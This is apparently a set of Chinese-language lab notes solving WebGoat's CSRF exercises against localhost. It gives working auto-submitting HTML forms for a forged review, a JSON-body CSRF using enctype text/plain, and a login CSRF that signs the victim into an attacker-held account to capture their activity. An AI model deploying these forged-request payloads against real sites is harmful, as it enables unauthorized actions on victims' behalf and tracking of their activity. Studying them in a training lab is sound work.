单独准备一个html
<form accept-charset="UNKNOWN" id="basic-csrf-get" method="POST" name="form1" target="_blank" successcallback="" action="http://localhost:8080/WebGoat/csrf/basic-get-flag">
<input name="csrf" type="hidden" value="false">
<input type="submit" name="submit">
</form>
<form class="attack-form" accept-charset="UNKNOWN" id="csrf-review" method="POST" name="review-form" successcallback="" action="http://localhost:8080/WebGoat/csrf/review">
<input type="hidden" id="reviewText" name="reviewText" placeholder="Add a Review" type="text" value="on behalf">
<input type="hidden" id="reviewStars" name="stars" type="text" value="1">
<input type="hidden" name="validateReq" value="2aa14227b9a13d0bede0388a7fba9aa9">
<input type="submit" name="submit" value="Submit review">
</form>
要求在POST请求里传json,原始为表单
这里主要是通过表单提交的方式,在请求体里构造json字符串,参看 https://pentestmonkey.net/blog/csrf-xml-post-request,通过enctype="text/plain",将=号包进json里
<form name="feedback" enctype="text/plain" action="http://localhost:8080/WebGoat/csrf/feedback/message" method="POST">
<input type="hidden" name='{"name":"2","email":"2' value='2@2.com","subject":"service","message":"2"}'>
</form>
<script>document.feedback.submit();</script>
这里是想说让受害者登录攻击者的账号,用于收集登陆后的一些活动信息
<form name="login" action="http://localhost:8080/WebGoat/login" method="POST">
<input type="hidden" name='username' value='csrf-zqqqqq'>
<input type="hidden" name='password' value='123456'>
</form>
<script>document.login.submit();</script>
